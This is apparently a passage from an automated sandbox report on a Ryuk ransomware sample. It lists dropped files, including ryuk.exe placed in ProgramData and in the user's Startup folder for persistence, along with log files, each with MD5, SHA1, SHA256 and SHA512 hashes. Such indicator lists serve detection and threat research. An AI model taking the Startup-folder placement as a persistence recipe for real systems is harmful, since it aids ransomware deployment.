SHA256da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
SHA5125e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4
-
C:\ProgramData\hrmlog1Filesize
2KB
MD5cf30a97d06523d5819b46c7db7b85129
SHA1e8022ad32c76df2df6eae5118b45b96fd59e8453
SHA256b0a93326a7560db7b4d6d8401e7dbee5576058a1f24ff673f0e68c21ec5d3f4d
SHA5122fdfb096e8405d365ad1a91de8222616d8309e0b430b458493baf43cb38729374e0b43d1d5ee4ab13ae194728e3dc99741c7de9f26af4d45eebc3c389a96137e
-
C:\ProgramData\hrmlog1Filesize
2KB
MD5cf30a97d06523d5819b46c7db7b85129
SHA1e8022ad32c76df2df6eae5118b45b96fd59e8453
SHA256b0a93326a7560db7b4d6d8401e7dbee5576058a1f24ff673f0e68c21ec5d3f4d
SHA5122fdfb096e8405d365ad1a91de8222616d8309e0b430b458493baf43cb38729374e0b43d1d5ee4ab13ae194728e3dc99741c7de9f26af4d45eebc3c389a96137e
-
C:\ProgramData\hrmlog1Filesize
2KB
MD5cf30a97d06523d5819b46c7db7b85129
SHA1e8022ad32c76df2df6eae5118b45b96fd59e8453
SHA256b0a93326a7560db7b4d6d8401e7dbee5576058a1f24ff673f0e68c21ec5d3f4d
SHA5122fdfb096e8405d365ad1a91de8222616d8309e0b430b458493baf43cb38729374e0b43d1d5ee4ab13ae194728e3dc99741c7de9f26af4d45eebc3c389a96137e
-
C:\ProgramData\hrmlog2Filesize
292B
MD5e14553b25f8951635bc37c90beffecc0
SHA160d9f6ff88506a9fcd36342fa2698025e990a673
SHA2568227204f7a80f2358cdda31c351e2729b4d80901e47464e68e87d9b520fde7be
SHA5125a9e53a32193cadc97ae5cd89ba37f830b3021e01d2fea1f8d5f801f190da517183531089e032af2f800305d65c8b013024048a2ed92d09106ff462dc251b3d3
-
C:\ProgramData\hrmlog2Filesize
292B
MD5e14553b25f8951635bc37c90beffecc0
SHA160d9f6ff88506a9fcd36342fa2698025e990a673
SHA2568227204f7a80f2358cdda31c351e2729b4d80901e47464e68e87d9b520fde7be
SHA5125a9e53a32193cadc97ae5cd89ba37f830b3021e01d2fea1f8d5f801f190da517183531089e032af2f800305d65c8b013024048a2ed92d09106ff462dc251b3d3
-
C:\ProgramData\hrmlog2Filesize
292B
MD5e14553b25f8951635bc37c90beffecc0
SHA160d9f6ff88506a9fcd36342fa2698025e990a673
SHA2568227204f7a80f2358cdda31c351e2729b4d80901e47464e68e87d9b520fde7be
SHA5125a9e53a32193cadc97ae5cd89ba37f830b3021e01d2fea1f8d5f801f190da517183531089e032af2f800305d65c8b013024048a2ed92d09106ff462dc251b3d3
-
C:\ProgramData\ryuk.exeFilesize
885KB
MD56a5bf25ff4f72ebca91280ffda057260
SHA1722063331acdbfc93ccbfacbec045800a835dd9e
SHA2560d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA51264d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42
-
C:\Users\Admin\AppData\Local\Temp\RYUKIDFilesize
8B
MD585462c5c76a1f9effd9d24af445182da
SHA18b5f57029bd8ac3c5b182608de6691d6e1492b3f
SHA2568ade6464383a886e84e3d42c17f5f906d2b50e87963b345a6d45a714fd7442c4
SHA512828320205e9766d12ee2a7e052230a206eb1a8c8dc53ce3c406857bae05687431fe7237d59c3fa9559a71d925fc8b96f4f28b40d67ce610b7e0247c5671cc6e5
-
C:\Users\Admin\AppData\Local\Temp\hrmlog1Filesize
2KB
MD5cf30a97d06523d5819b46c7db7b85129
SHA1e8022ad32c76df2df6eae5118b45b96fd59e8453
SHA256b0a93326a7560db7b4d6d8401e7dbee5576058a1f24ff673f0e68c21ec5d3f4d
SHA5122fdfb096e8405d365ad1a91de8222616d8309e0b430b458493baf43cb38729374e0b43d1d5ee4ab13ae194728e3dc99741c7de9f26af4d45eebc3c389a96137e
-
C:\Users\Admin\AppData\Local\Temp\hrmlog2Filesize
292B
MD5e14553b25f8951635bc37c90beffecc0
SHA160d9f6ff88506a9fcd36342fa2698025e990a673
SHA2568227204f7a80f2358cdda31c351e2729b4d80901e47464e68e87d9b520fde7be
SHA5125a9e53a32193cadc97ae5cd89ba37f830b3021e01d2fea1f8d5f801f190da517183531089e032af2f800305d65c8b013024048a2ed92d09106ff462dc251b3d3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exeFilesize
885KB
MD56a5bf25ff4f72ebca91280ffda057260
SHA1722063331acdbfc93ccbfacbec045800a835dd9e
SHA2560d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA51264d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42